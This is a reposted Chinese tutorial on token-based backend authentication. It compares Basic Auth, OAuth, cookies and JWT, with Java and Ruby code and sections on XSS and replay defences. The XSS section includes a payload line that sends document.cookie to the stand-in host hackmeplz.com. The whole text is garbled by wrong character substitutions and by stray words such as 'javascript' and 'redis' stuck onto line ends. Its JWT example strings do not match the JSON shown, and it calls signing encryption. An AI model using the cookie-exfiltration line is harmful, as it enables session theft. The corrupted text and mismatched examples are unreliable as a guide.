基于token的后台身份验证(转载)

时间 2019-11-09

标签基于 token 后台身份验证转载繁體版

原文原文链接

几种经常使用的认证机制

HTTP Basic Auth

HTTP Basic Auth简单点说明就是每次请求API时都提供用户的username和password，简言之，Basic Auth是配合RESTful API 使用的最简单的认证方式，只需提供用户名密码便可，但因为有把用户名密码暴露给第三方客户端的风险，在生产环境下被使用的愈来愈少。所以，在开发对外开放的RESTful API时，尽可能避免采用HTTP Basic Authjavascript

OAuth

OAuth（开放受权）是一个开放的受权标准，容许用户让第三方应用访问该用户在某一web服务上存储的私密的资源（如照片，视频，联系人列表），而无需将用户名和密码提供给第三方应用。html

OAuth容许用户提供一个令牌，而不是用户名和密码来访问他们存放在特定服务提供者的数据。每个令牌受权一个特定的第三方系统（例如，视频编辑网站)在特定的时段（例如，接下来的2小时内）内访问特定的资源（例如仅仅是某一相册中的视频）。这样，OAuth让用户能够受权第三方网站访问他们存储在另外服务提供者的某些特定信息，而非全部内容。下面是OAuth2.0的流程：前端

这种基于OAuth的认证机制适用于我的消费者类的互联网产品，如社交类APP等应用，可是不太适合拥有自有认证权限管理的企业应用；java

Cookie认证机制就是为一次请求认证在服务端建立一个Session对象，同时在客户端的浏览器端建立了一个Cookie对象；经过客户端带上来Cookie对象来与服务器端的session对象匹配来实现状态管理的。默认的，当咱们关闭浏览器的时候，cookie会被删除。但能够经过修改cookie 的expire time使cookie在必定时间内有效；node

Token Auth

Token Auth的优势

Token机制相对于Cookie机制又有什么好处呢？git

支持跨域访问: Cookie是不容许垮域访问的，这一点对Token机制是不存在的，前提是传输的用户认证信息经过HTTP头传输.
无状态(也称：服务端可扩展行):Token机制在服务端不须要存储session信息，由于Token 自身包含了全部登陆用户的信息，只须要在客户端的cookie或本地介质存储状态信息.
更适用CDN: 能够经过内容分发网络请求你服务端的全部资料（如：javascript，HTML,图片等），而你的服务端只要提供API便可.
去耦: 不须要绑定到一个特定的身份验证方案。Token能够在任何地方生成，只要在你的API被调用的时候，你能够进行Token生成调用便可.
更适用于移动应用: 当你的客户端是一个原平生台（iOS, Android，Windows 8等）时，Cookie是不被支持的（你须要经过Cookie容器进行处理），这时采用Token认证机制就会简单得多。
CSRF:由于再也不依赖于Cookie，因此你就不须要考虑对CSRF（跨站请求伪造）的防范。
性能: 一次网络往返时间（经过数据库查询session信息）总比作一次HMACSHA256计算的Token验证和解析要费时得多.
不须要为登陆页面作特殊处理: 若是你使用Protractor 作功能测试的时候，再也不须要为登陆页面作特殊处理.
基于标准化:你的API能够采用标准化的 JSON Web Token (JWT). 这个标准已经存在多个后端库（.NET, Ruby, Java,Python, PHP）和多家公司的支持（如：Firebase,Google, Microsoft）.

基于JWT的Token认证机制实现

JSON Web Token（JWT）是一个很是轻巧的规范。这个规范容许咱们使用JWT在用户和服务器之间传递安全可靠的信息。github

JWT的组成

一个JWT实际上就是一个字符串，它由三部分组成，头部、载荷与签名。
载荷（Payload）web

{ "iss": "Online JWT Builder", 
  "iat": 1416797419, 
  "exp": 1448333419, 
  "aud": "www.example.com", 
  "sub": "jrocket@example.com", 
  "GivenName": "Johnny", 
  "Surname": "Rocket", 
  "Email": "jrocket@example.com", 
  "Role": [ "Manager", "Project Administrator" ] 
}

iss: 该JWT的签发者，是否使用是可选的；
sub: 该JWT所面向的用户，是否使用是可选的；
aud: 接收该JWT的一方，是否使用是可选的；
exp(expires): 何时过时，这里是一个Unix时间戳，是否使用是可选的；
iat(issued at): 在何时签发的(UNIX时间)，是否使用是可选的；
其余还有：
nbf (Not Before)：若是当前时间在nbf里的时间以前，则Token不被接受；通常都会留一些余地，好比几分钟；，是否使用是可选的；

将上面的JSON对象进行[base64编码]能够获得下面的字符串。这个字符串咱们将它称做JWT的Payload（载荷）。redis

eyJpc3MiOiJKb2huIFd1IEpXVCIsImlhdCI6MTQ0MTU5MzUwMiwiZXhwIjoxNDQxNTk0NzIyLCJhdWQiOiJ3d3cuZXhhbXBsZS5jb20iLCJzdWIiOiJqcm9ja2V0QGV4YW1wbGUuY29tIiwiZnJvbV91c2VyIjoiQiIsInRhcmdldF91c2VyIjoiQSJ9

小知识：Base64是一种基于64个可打印字符来表示二进制数据的表示方法。因为2的6次方等于64，因此每6个比特为一个单元，对应某个可打印字符。三个字节有24个比特，对应于4个Base64单元，即3个字节须要用4个可打印字符来表示。JDK 中提供了很是方便的 BASE64Encoder 和 BASE64Decoder，用它们能够很是方便的完成基于 BASE64 的编码和解码算法

头部（Header）
JWT还须要一个头部，头部用于描述关于该JWT的最基本的信息，例如其类型以及签名所用的算法等。这也能够被表示成一个JSON对象。

{
"typ": "JWT",
"alg": "HS256"
}

在头部指明了签名算法是HS256算法。
固然头部也要进行BASE64编码，编码后的字符串以下：

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9

签名（Signature）
将上面的两个编码后的字符串都用句号.链接在一块儿（头部在前），就造成了:

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcm9tX3VzZXIiOiJCIiwidGFyZ2V0X3VzZXIiOiJBIn0

最后，咱们将上面拼接完的字符串用HS256算法进行加密。在加密的时候，咱们还须要提供一个密钥（secret）。若是咱们用mystar做为密钥的话，那么就能够获得咱们加密后的内容:

rSWamyAYwuHCo7IFAgd1oRpSP7nzL7BF5t7ItqpKViM

最后将这一部分签名也拼接在被签名的字符串后面，咱们就获得了完整的JWT:

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcm9tX3VzZXIiOiJCIiwidGFyZ2V0X3VzZXIiOiJBIn0.rSWamyAYwuHCo7IFAgd1oRpSP7nzL7BF5t7ItqpKViM

在咱们的请求URL中会带上这串JWT字符串：

https://your.awesome-app.com/make-friend/?jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcm9tX3VzZXIiOiJCIiwidGFyZ2V0X3VzZXIiOiJBIn0.rSWamyAYwuHCo7IFAgd1oRpSP7nzL7BF5t7ItqpKViM

认证过程

下面咱们从一个实例来看如何运用JWT机制实现认证：

登陆

第一次认证：第一次登陆，用户从浏览器输入用户名/密码，提交后到服务器的登陆处理的Action层（Login Action）；
Login Action调用认证服务进行用户名密码认证，若是认证经过，Login Action层调用用户信息服务获取用户信息（包括完整的用户信息及对应权限信息）；
返回用户信息后，Login Action从配置文件中获取Token签名生成的秘钥信息，进行Token的生成；
生成Token的过程当中能够调用第三方的JWT Lib生成签名后的JWT数据；
完成JWT数据签名后，将其设置到COOKIE对象中，并重定向到首页，完成登陆过程；

请求认证

基于Token的认证机制会在每一次请求中都带上完成签名的Token信息，这个Token信息可能在COOKIE
中，也可能在HTTP的Authorization头中；

客户端（APP客户端或浏览器）经过GET或POST请求访问资源（页面或调用API）；
认证服务做为一个Middleware HOOK 对请求进行拦截，首先在cookie中查找Token信息，若是没有找到，则在HTTP Authorization Head中查找；
若是找到Token信息，则根据配置文件中的签名加密秘钥，调用JWT Lib对Token信息进行解密和解码；
完成解码并验证签名经过后，对Token中的exp、nbf、aud等信息进行验证；
所有经过后，根据获取的用户的角色权限信息，进行对请求的资源的权限逻辑判断；
若是权限逻辑判断经过则经过Response对象返回；不然则返回HTTP 401；

对Token认证的五点认识

对Token认证机制有5点直接注意的地方：

一个Token就是一些信息的集合；
在Token中包含足够多的信息，以便在后续请求中减小查询数据库的概率；
服务端须要对cookie和HTTP Authrorization Header进行Token信息的检查；
基于上一点，你能够用一套token认证代码来面对浏览器类客户端和非浏览器类客户端；
由于token是被签名的，因此咱们能够认为一个能够解码认证经过的token是由咱们系统发放的，其中带的信息是合法有效的；

JWT的JAVA实现

Java中对JWT的支持能够考虑使用JJWT开源库；JJWT实现了JWT, JWS, JWE 和 JWA RFC规范；下面将简单举例说明其使用：
生成Token码

import javax.crypto.spec.SecretKeySpec;
import javax.xml.bind.DatatypeConverter;
import java.security.Key;
import io.jsonwebtoken.*;
import java.util.Date;    
 
//Sample method to construct a JWT
private String createJWT(String id, String issuer, String subject, long ttlMillis) {
//The JWT signature algorithm we will be using to sign the token
SignatureAlgorithm signatureAlgorithm = SignatureAlgorithm.HS256;
long nowMillis = System.currentTimeMillis();
Date now = new Date(nowMillis);
//We will sign our JWT with our ApiKey secret
byte[] apiKeySecretBytes = DatatypeConverter.parseBase64Binary(apiKey.getSecret());
Key signingKey = new SecretKeySpec(apiKeySecretBytes, signatureAlgorithm.getJcaName());
//Let's set the JWT Claims
JwtBuilder builder = Jwts.builder().setId(id)
                                .setIssuedAt(now)
                                .setSubject(subject)
                                .setIssuer(issuer)
                                .signWith(signatureAlgorithm, signingKey);
 
//if it has been specified, let's add the expiration
if (ttlMillis >= 0) {
    long expMillis = nowMillis + ttlMillis;
    Date exp = new Date(expMillis);
    builder.setExpiration(exp);
}
//Builds the JWT and serializes it to a compact, URL-safe string
return builder.compact();
}

解码和验证Token码

import javax.xml.bind.DatatypeConverter;
import io.jsonwebtoken.Jwts;
import io.jsonwebtoken.Claims;
 
//Sample method to validate and read the JWT
private void parseJWT(String jwt) {
//This line will throw an exception if it is not a signed JWS (as expected)
Claims claims = Jwts.parser()        
   .setSigningKey(DatatypeConverter.parseBase64Binary(apiKey.getSecret()))
   .parseClaimsJws(jwt).getBody();
System.out.println("ID: " + claims.getId());
System.out.println("Subject: " + claims.getSubject());
System.out.println("Issuer: " + claims.getIssuer());
System.out.println("Expiration: " + claims.getExpiration());
}

基于JWT的Token认证的安全问题

确保验证过程的安全性

如何保证用户名/密码验证过程的安全性；由于在验证过程当中，须要用户输入用户名和密码，在这一过程当中，用户名、密码等敏感信息须要在网络中传输。所以，在这个过程当中建议采用HTTPS，经过SSL加密传输，以确保通道的安全性。

如何防范XSS Attacks

浏览器能够作不少事情，这也给浏览器端的安全带来不少隐患，最多见的如：XSS攻击：跨站脚本攻击(Cross Site Scripting)；若是有个页面的输入框中容许输入任何信息，且没有作防范措施，若是咱们输入下面这段代码：

<img src="x" /> a.src='https://hackmeplz.com/yourCookies.png/?cookies=’+document.cookie;return a}())"

这段代码会盗取你域中的全部cookie信息，并发送到 hackmeplz.com；那么咱们如何来防范这种攻击呢？

XSS攻击代码过滤
移除任何会致使浏览器作非预期执行的代码，这个能够采用一些库来实现（如：js下的js-xss，JAVA下的XSS HTMLFilter，PHP下的TWIG）；若是你是将用户提交的字符串存储到数据库的话（也针对SQL注入攻击），你须要在前端和服务端分别作过滤；
采用HTTP-Only Cookies
经过设置Cookie的参数： HttpOnly; Secure 来防止经过JavaScript 来访问Cookie；
如何在Java中设置cookie是HttpOnly呢？
Servlet 2.5 API 不支持 cookie设置HttpOnly
http://docs.oracle.com/cd/E17802_01/products/products/servlet/2.5/docs/servlet-2_5-mr2/
建议升级Tomcat7.0，它已经实现了Servlet3.0
http://tomcat.apache.org/tomcat-7.0-doc/servletapi/javax/servlet/http/Cookie.html
或者经过这样来设置：

//设置cookie
response.addHeader("Set-Cookie", "uid=112; Path=/; HttpOnly");

//设置多个cookie
response.addHeader("Set-Cookie", "uid=112; Path=/; HttpOnly");
response.addHeader("Set-Cookie", "timeout=30; Path=/test; HttpOnly");

//设置https的cookie
response.addHeader("Set-Cookie", "uid=112; Path=/; Secure; HttpOnly");

在实际使用中，咱们可使FireCookie查看咱们设置的Cookie 是不是HttpOnly；

如何防范Replay Attacks

所谓重放攻击就是攻击者发送一个目的主机已接收过的包，来达到欺骗系统的目的，主要用于身份认证过程。好比在浏览器端经过用户名/密码验证得到签名的Token被木马窃取。即便用户登出了系统，黑客仍是能够利用窃取的Token模拟正常请求，而服务器端对此彻底不知道，觉得JWT机制是无状态的。
针对这种状况，有几种经常使用作法能够用做参考：
一、时间戳 +共享秘钥
这种方案，客户端和服务端都须要知道：

User ID
共享秘钥

客户端

auth_header = JWT.encode({
  user_id: 123,
  iat: Time.now.to_i,      # 指定token发布时间
  exp: Time.now.to_i + 2   # 指定token过时时间为2秒后，2秒时间足够一次HTTP请求，同时在必定程度确保上一次token过时，减小replay attack的几率；
}, "<my shared secret>")
RestClient.get("http://api.example.com/", authorization: auth_header)

服务端

class ApiController < ActionController::Base
  attr_reader :current_user
  before_action :set_current_user_from_jwt_token

  def set_current_user_from_jwt_token
    # Step 1:解码JWT，并获取User ID，这个时候不对Token签名进行检查
    # the signature. Note JWT tokens are *not* encrypted, but signed.
    payload = JWT.decode(request.authorization, nil, false)

    # Step 2: 检查该用户是否存在于数据库
    @current_user = User.find(payload['user_id'])
    
    # Step 3: 检查Token签名是否正确.
    JWT.decode(request.authorization, current_user.api_secret)
    
    # Step 4: 检查 "iat" 和"exp" 以确保这个Token是在2秒内建立的.
    now = Time.now.to_i
    if payload['iat'] > now || payload['exp'] < now
      # 若是过时则返回401
    end
  rescue JWT::DecodeError
    # 返回 401
  end
end

二、时间戳 +共享秘钥+黑名单（相似Zendesk的作法）
客户端

auth_header = JWT.encode({
  user_id: 123,
  jti: rand(2 << 64).to_s,  # 经过jti确保一个token只使用一次，防止replace attack
  iat: Time.now.to_i,       # 指定token发布时间.
  exp: Time.now.to_i + 2    # 指定token过时时间为2秒后
}, "<my shared secret>")
RestClient.get("http://api.example.com/", authorization: auth_header)